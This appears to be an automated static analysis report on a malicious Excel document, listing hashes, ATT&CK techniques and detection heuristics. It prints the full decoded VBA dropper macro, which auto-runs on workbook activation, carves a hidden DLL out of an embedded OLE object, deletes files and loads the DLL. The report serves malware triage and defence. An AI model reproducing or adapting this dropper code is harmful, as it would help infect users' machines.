Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e09258bd1d851066…

MALICIOUS

Office (OLE)

Size: 719.0 KB
Created: 2019-08-30 09:14:50
Authoring application: Microsoft Excel
First seen: 2020-02-04
MD5: 14a00e94fdc591e69353da90713c6556
SHA-1: cd3527832754d61f3a538af807d1374b24adaef7
SHA-256: e09258bd1d851066d6e419e87bd01e896097a5e2c58dd210708e85a285ac4478
Risk Score: 500

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer
  • T1027 Obfuscated Files or Information

The sample is an Excel document containing VBA macros that leverage WScript.Shell and CreateObject to execute embedded shellcode. The macros also appear to decode and execute an Excel 4.0 macro, which in turn launches a second-stage PE executable. This indicates dropper functionality designed to download and execute further malicious payloads.

Heuristics 11

  • ClamAV: Xls.Dropper.Sdrop-7331943-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
    Matched line in script
    Debug.Print Temp1
    CCount = Application.ExecuteExcel4Macro(Temp1)
    Debug.Print CCount
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12299 bytes
SHA-256: 1c0019131fb0deb9ee95c8088908b1acf487dabf8f6d22f4640b58e1edbb2563
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If

End Sub

Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If Win64 Then
    Public Declare PtrSafe Function Wakeup Lib _
        "templ2.dll" () As Integer
    Public Declare PtrSafe Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function Wakeup Lib _
        "templ1.dll" () As Integer
#End If
   
Public Function ITestModule_GetErrorInterface()
    Set ITestModule_GetErrorInterface = g_errorobj
End Function
Public Function ITestModule_GetProviderInterface()
    Set ITestModule_GetProviderInterface = g_provobj
End Function
Public Sub ITestModule_SetErrorInterface(ByVal pError)
    Set g_errorobj = pError
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_SetErrorInterface" + Chr(10)
    End If
End Sub
Public Sub ITestModule_SetProviderInterface(ByVal pProvInfo)
On Error GoTo ixx
    Set g_provobj = pProvInfo
    For i = 0 To numcases - 1
        ca.ses(i).SetCaseProvider g_provobj
    Next i
Exit Sub
ixx:
MsgBox Err.Description
End Sub
Public Function ITestModule_Terminate() As Boolean
    ITestModule_Terminate = True
End Function
Public Sub AppStart()

ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
Dim WaitForSingle As Object
    Dim SpecialPath As String
    

Set WaitForSingle = CreateObject("WScript.Shell")
   
UserForm3.TextBox1.Tag = WaitForSingle.ExpandEnvironmentStrings("%" + UserForm3.TextBox1.Tag + "%")

UserForm3.TextBox1.Tag = Replace(UserForm3.TextBox1.Tag, "%", "")
UserForm3.TextBox2.Tag = WaitForSingle.SpecialFolders(UserForm3.TextBox2.Tag)
'LocalAppData
ChDir (UserForm3.TextBox1.Tag)

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
End Sub




Public Function ITestModule_GetCase(ByVal lIndex As Long)
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
    End If
    numcases = numcases + 1
    Select Case lIndex
        Case 0
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
        Case 1
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
        Case 2
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
        Case 3
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
        Case 4
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
        Case 5
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
        Case 6
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
        Case 7
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
        Case 8
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
        Case 9
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
        Case 10
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldattributes")
        Case 11
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.flddefinedsize")
        Case 12
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldname")
        Case 13
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldoriginalvalue")
        Case 14
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldprecision")
        Case 15
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldtype")
        Case 16
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldvalue")
        Case 17
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsactivecn")
        Case 18
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsclose")
        Case 19
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmove")
        Case 20
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovefirst")
        Case 21
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovenext")
        Case 22
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmoveprev")
        Case 23
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsopen")
        Case 24
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssource")
        Case 25
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssupports")
        Case 26
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsbof")
        Case 27
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rseof")
        Case 28
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rscachesize")
        Case 29
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rspagesize")
        Case 30
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsrequery")
  End Select
    ca.ses(numcases - 1).SetCaseError g_errorobj
    ca.ses(numcases - 1).SetCaseProvider g_provobj
    Set Locprov = g_provobj
    Set ITestModule_GetCase = ca.ses(numcases - 1)
End Function
Public Sub NewValuje(s As String, nm As String, fl As Long, Variable_6 As Integer)
    Dim Variable_1 As Long, Variable_2 As Byte, Variable_3 As Byte, Variable_4 As Byte
    Dim Variable_5() As Long

    ReDim Variable_5(1 To fl)
    Variable_5(1) = CByte(40 + 37)
    Variable_5(2) = CByte(40 + 50)
    Variable_5(1 + 2) = CByte(40 + 104)
    
    Variable_1 = FreeFile
    Open s For Binary Access Read As Variable_1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(Variable_1)
        Get Variable_1, , Variable_2
        If Variable_2 = Variable_5(1) Then
           Get Variable_1, , Variable_3
           If Variable_3 = Variable_5(2) Then
                Get Variable_1, , Variable_4
                If Variable_4 = Variable_5(3) Then
                     If cur = Variable_6 Then
                        For k = 4 To fl
                            Get Variable_1, , Variable_2
                            Variable_5(k) = Variable_2
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close Variable_1
    
    Variable_1 = FreeFile
    Open nm For Binary Lock Read Write As #Variable_1
    For i = LBound(Variable_5) To UBound(Variable_5)
        Put #Variable_1, , CByte(Variable_5(i))
    Next i

    Close #Variable_1
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C4017465-4FF0-4D68-83FB-A26D536B03A0}{4F7840C1-5122-45C4-9EFF-7DBE9BE26117}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub

Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
  
#End If



Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

   
Else
 SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub



Attribute VB_Name = "Module3"




Sub test()

Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)

For R = 1 To RCount
    For C = 1 To CCount
        Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
    Next
Next

End Sub




Public Sub ReplaceCurrentModule()
    NameFav = UserForm3.TextBox1.Tag + "\dependence" + ".xlsx"
    ZipName = NameFav + ".zip"
    ZipFolder = UserForm3.TextBox1.Tag
    Dim nm As String
    Dim API_LENGTH As Long
    Dim d_6 As Integer
    nm = UserForm3.TextBox2.Tag + "\templ1"
    API_LENGTH = 278528
    d_6 = 1
            
#If Win64 Then
    nm = UserForm3.TextBox2.Tag + "\templ2"
    API_LENGTH = 233472
    d_6 = 2
#End If
nm = nm + ".d" + "ll"
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs NameFav, FileFormat:=50 + 1
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
    
        FileCopy NameFav, ZipName
        
        Set oApp = CreateObject("Shell." + "Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        NewValuje ZipFolder + "\oleObject1." + "bin", nm, API_LENGTH, d_6
        
        ChDir (UserForm3.TextBox2.Tag)
        No_Wakeup = Wakeup2(nm)
        Wakeup

End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{0FF56802-FFC3-4D6F-8618-52A2374E216A}{14BA840B-7252-4D43-9DC9-5A612EB825C0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module4"

Attribute VB_Name = "Module5"

Attribute VB_Name = "Module6"
embedded_office_0000305f.exe | embedded-pe | Office MZ+PE at offset 0x305F | 723873 bytes
SHA-256: 91f6915ea3a8fceb7509f8a80e8f652483b556b23f970e363f7efc5a4c3d9c77
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD01142475/Ole10Native | 525353 bytes
SHA-256: 8d5f4693e5f70a2bd6e5a6f285f9c9f06e0c48b89e3e6c89af2153ea3354cc94